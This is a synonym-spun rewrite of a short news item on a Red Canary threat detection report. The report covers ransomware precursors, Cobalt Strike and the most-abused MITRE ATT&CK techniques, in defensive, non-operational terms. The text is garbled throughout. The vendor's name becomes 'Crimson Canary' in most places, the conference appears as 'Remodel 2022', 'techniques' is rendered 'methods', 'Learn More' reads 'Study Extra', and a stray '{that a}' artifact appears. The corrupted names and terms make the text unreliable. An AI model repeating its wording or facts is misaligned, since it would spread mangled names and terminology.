We’re excited to carry Remodel 2022 again in-person July 19 and just about July 20 – August 3. Be a part of AI and knowledge leaders for insightful talks and thrilling networking alternatives. Study Extra
New analysis from Red Canary has indicated that by growing sturdy detection protection for the methods adversaries abuse most frequently, safety groups can obtain defense-in-depth towards the numerous threats that leverage these methods and the broader traits that dominate the infosec panorama.
The report is organized into three cascading sections: traits, the threats that comprise these traits and the MITRE ATT&CK® methods which are leveraged by these threats. Every part contains intensive steering that safety groups can use to mitigate, stop or detect the malicious exercise described within the report.
The largest pattern in 2021, not surprisingly, was ransomware. Counterintuitively, Crimson Canary doesn’t detect a lot ransomware, and the explanation for that’s most likely the only most necessary takeaway from the report. Ransomware is nearly at all times the eventual payload delivered by earlier-stage malicious software program or exercise; when you detect the threats that ship the ransomware, you cease the ransomware earlier than it arrives. So, how do you detect these threats? Concentrate on the methods that adversaries are most probably to leverage.
Of the highest 10 threats Crimson Canary noticed in 2021, 60% are ransomware precursors (i.e., threats that’ve been identified to ship ransomware as a follow-on payload). Extra staggering is {that a} full 100% of the highest ATT&CK methods have been used throughout an tried ransomware an infection.
For example, a major plurality of ransomware infections contain using a command and management (C2) product referred to as Cobalt Strike — Crimson Canary’s second-ranked menace. Cobalt Strike, in flip, leverages ATT&CK methods like PowerShell, Rundll32, Course of Injection, Obfuscated Information or Info and DLL Search Order Hijacking, all of that are within the high 10. In the event you develop broad detection protection for these methods, you then’ve acquired an amazing shot of detecting Cobalt Strike and stopping ransomware infections.
The report relies on evaluation of the greater than 30,000 confirmed threats detected throughout Crimson Canary’s buyer base in 2021.
Learn the full report by Crimson Canary.
